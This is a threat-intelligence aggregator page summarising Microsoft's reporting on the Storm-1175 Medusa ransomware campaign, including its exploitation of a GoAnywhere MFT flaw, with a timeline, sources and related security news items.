Storm-1175 high-velocity exploit campaign
Campaign
Summary
Hide ▲
Show ▼
Storm-1175 is running a high-velocity exploit campaign that rapidly turns access into Medusa ransomware deployment, creating risk of data exfiltration and encrypted outages. The group is now tied to CVE-2025-10035 in Fortra GoAnywhere Managed File Transfer (MFT), a critical deserialization flaw with CVSS 10.0 that Microsoft says is being actively exploited in ransomware attacks. Microsoft says Storm-1175 first used the flaw as a zero day on September 11, and Fortra patched it on September 18. Post-exploitation activity included SimpleHelp, MeshAgent, mstsc.exe, Rclone, lateral movement, and a Cloudflare tunnel for command-and-control.
Cases
Related Happenings
Microsoft Defender zero-days exploited in attacks (multiple vulnerabilities)
Vulnerability
First: 21.05.2026 10:49
Last: 21.05.2026 10:49
Sources 1
About this happening:
Microsoft began rolling out fixes for **CVE-2026-41091** and **CVE-2026-45498**, two **actively exploited zero-days** in **Microsoft Defender** components that affect unpatched Wi...
Microsoft Defender zero-days exploited in attacks (multiple vulnerabilities)
VulnerabilityAbout this happening: Microsoft began rolling out fixes for **CVE-2026-41091** and **CVE-2026-45498**, two **actively exploited zero-days** in **Microsoft Defender** components that affect unpatched Wi...
Vulnerability exploitation overtakes credentials as top breach entry path
Target Trend
First: 20.05.2026 11:40
Last: 20.05.2026 11:40
Sources 1
About this happening:
**Vulnerability exploitation** became the top initial access vector for **data breaches** over the past year, displacing **compromised credentials** and signaling a major shift in...
Vulnerability exploitation overtakes credentials as top breach entry path
Target TrendAbout this happening: **Vulnerability exploitation** became the top initial access vector for **data breaches** over the past year, displacing **compromised credentials** and signaling a major shift in...
Verizon 2026 DBIR shows vulnerability exploitation as the top breach access trend in 2025
Target Trend
First: 20.05.2026 03:04
Last: 20.05.2026 03:04
Sources 1
About this happening:
**Vulnerability exploitation** became the leading breach access vector in **2025**, increasing compromise risk across **31,000 incidents** and **22,000+ confirmed breaches**. **Un...
Verizon 2026 DBIR shows vulnerability exploitation as the top breach access trend in 2025
Target TrendAbout this happening: **Vulnerability exploitation** became the leading breach access vector in **2025**, increasing compromise risk across **31,000 incidents** and **22,000+ confirmed breaches**. **Un...
Fox Tempest's malware-signing service scales trusted-signed malware for ransomware gangs
Threat Actor Meta
First: 20.05.2026 00:47
Last: 20.05.2026 00:47
Sources 1
About this happening:
Microsoft disrupted **Fox Tempest**'s **malware-signing service** in **May 2026**, cutting off a criminal platform that helped ransomware gangs and other cybercriminals obtain tru...
Fox Tempest's malware-signing service scales trusted-signed malware for ransomware gangs
Threat Actor MetaAbout this happening: Microsoft disrupted **Fox Tempest**'s **malware-signing service** in **May 2026**, cutting off a criminal platform that helped ransomware gangs and other cybercriminals obtain tru...
Storm-2949 Microsoft 365 and Azure data-theft campaign
Campaign
First: 19.05.2026 22:35
Last: 19.05.2026 22:35
Sources 1
About this happening:
The **Storm-2949** campaign is targeting **Microsoft 365 and Azure production environments** to steal sensitive data, increasing the risk of privileged-account takeover and cloud...
Storm-2949 Microsoft 365 and Azure data-theft campaign
CampaignAbout this happening: The **Storm-2949** campaign is targeting **Microsoft 365 and Azure production environments** to steal sensitive data, increasing the risk of privileged-account takeover and cloud...
Timeline
-
06.04.2026 19:56 3 articles · 1mo ago
Storm-1175 high-velocity Medusa ransomware campaign
Technical Analysis UpdateMicrosoft says Storm-1175, a China-based financially motivated cybercriminal group linked to Medusa ransomware, is rapidly weaponizing n-day and zero-day flaws, sometimes within 24 hours and sometimes before patches are released. The operators chain multiple exploits with new user account creation, remote monitoring and management software deployment, credential theft, and security software disabling to move from initial access to data exfiltration and Medusa ransomware deployment. Recent activity has affected healthcare, education, professional services, and finance organizations in Australia, the United Kingdom, and the United States, with exploited products including GoAnywhere MFT, SmarterMail, Microsoft Exchange, Papercut, Ivanti Connect Secure and Policy Secure, ConnectWise ScreenConnect, JetBrains TeamCity, SimpleHelp, CrushFTP, and BeyondTrust.
Show sources
- Microsoft links Medusa ransomware affiliate to zero-day attacks — www.bleepingcomputer.com — 06.04.2026 19:56
- Microsoft links Medusa ransomware affiliate to zero-day attacks — www.bleepingcomputer.com — 06.04.2026 19:56
- Microsoft: Critical GoAnywhere Bug Exploited in Medusa Ransomware Campaign — www.infosecurity-magazine.com — 07.10.2025 11:45